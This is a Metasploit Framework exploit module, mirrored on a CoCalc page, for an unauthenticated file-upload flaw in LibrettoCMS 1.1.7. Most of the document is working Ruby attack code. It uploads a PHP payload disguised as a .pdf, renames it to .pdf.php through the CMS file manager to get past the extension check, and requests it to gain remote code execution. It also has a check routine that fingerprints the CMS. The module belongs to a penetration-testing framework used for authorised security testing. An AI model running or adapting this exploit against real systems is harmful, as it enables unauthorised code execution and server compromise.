CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/libretto_upload_exec.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10
  include Msf::Exploit::PhpEXE

11


12
  def initialize(info={})

13
    super(update_info(info,

14
      'Name'           => "LibrettoCMS File Manager Arbitary File Upload Vulnerability",

15
      'Description'    => %q{

16
        This module exploits a file upload vulnerability found in LibrettoCMS 1.1.7, and

17
        possibly prior.  Attackers can bypass the file extension check and abuse the upload

18
        feature in order to upload a malicious PHP file without authentication, which

19
        results in arbitrary remote code execution.

20
      },

21
      'License'        => MSF_LICENSE,

22
      'Author'         =>

23
        [

24
          'CWH',

25
          'sinn3r'  #Metasploit

26
        ],

27
      'References'     =>

28
        [

29
          ['OSVDB', '94391'],

30
          ['EDB', '26213']

31
        ],

32
      'Payload'        =>

33
        {

34
          'BadChars' => "\x00"

35
        },

36
      'Platform'       => %w{ linux php },

37
      'Targets'        =>

38
        [

39
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }  ],

40
          [ 'Linux x86'            , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]

41
        ],

42
      'Privileged'     => false,

43
      'DisclosureDate' => '2013-06-14',

44
      'DefaultTarget'  => 0))

45


46
    register_options(

47
      [

48
        OptString.new('TARGETURI', [true, 'The base path to LibrettoCMS', '/librettoCMS_v.2.2.2/'])

49
      ])

50
  end

51


52
  def check

53
    res = send_request_raw({'uri' => normalize_uri(target_uri.path)})

54
    if not res

55
      vprint_error("Connection timed out")

56
      return Exploit::CheckCode::Unknown

57
    end

58


59
    if res.body =~ /Powered by <a href=".+">Libretto CMS/

60
      return Exploit::CheckCode::Detected

61
    end

62


63
    Exploit::CheckCode::Safe

64
  end

65


66


67
  def upload(base)

68
    p     = get_write_exec_payload(:unlink_self=>true)

69
    fname = "#{Rex::Text.rand_text_alpha(6)}.pdf"

70


71
    data = Rex::MIME::Message.new

72
    data.add_part(fname, nil, nil, "form-data; name=\"Filename\"")

73
    data.add_part(p, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{fname}\"")

74
    data.add_part('Submit Query', nil, nil, 'form-data; name="Upload"')

75
    post_data = data.to_s

76


77
    uri = normalize_uri(base, 'adm', 'ui', 'js', 'ckeditor', 'plugins', 'pgrfilemanager', 'php', 'upload.php')

78


79
    res = send_request_cgi({

80
      'method'   => 'POST',

81
      'uri'      => uri,

82
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",

83
      'data'     => post_data,

84
      'vars_get' => {'type'=>'all files'}

85
    })

86


87
    if not res

88
      fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")

89
    elsif res.code.to_i != 200

90
      fail_with(Failure::UnexpectedReply, "#{peer} - Unknown reply: #{res.code.to_s}")

91
    end

92


93
    fname

94
  end

95


96


97
  def rename(base, original_fname)

98
    new_name = "#{Rex::Text.rand_text_alpha(5)}.pdf.php"

99
    uri = normalize_uri(base, 'adm', 'ui', 'js', 'ckeditor', 'plugins', 'pgrfilemanager', 'php', 'files.php')

100
    res = send_request_cgi({

101
      'method'    => 'POST',

102
      'uri'       => uri,

103
      'vars_get'  => { 'type' => 'all files' },

104
      'vars_post' => {

105
        'fun'         => 'renameFile',

106
        'dir'         => '',

107
        'filename'    => original_fname,

108
        'newFilename' => new_name

109
      }

110
    })

111


112
    if not res

113
      fail_with(Failure::Unknown, "#{peer} - Request timed out while renaming")

114
    elsif res.body !~ /"res":"OK"/

115
      fail_with(Failure::Unknown, "#{peer} - Failed to rename file")

116
    end

117


118
    new_name

119
  end

120


121


122
  def exec(base, payload_fname)

123
    res = send_request_cgi({ 'uri' => normalize_uri(base, 'userfiles', payload_fname) })

124
    if res and res.code.to_i == 404

125
      fail_with(Failure::NotFound, "#{peer} - Not found: #{payload_fname}")

126
    end

127
  end

128


129


130
  def exploit

131
    base = target_uri.path

132


133
    print_status("Uploading malicious file...")

134
    orig_fname = upload(base)

135


136
    print_status("Renaming #{orig_fname}...")

137
    new_fname = rename(base, orig_fname)

138


139
    print_status("Executing #{new_fname}...")

140
    exec(base, new_fname)

141
  end

142
end

143


144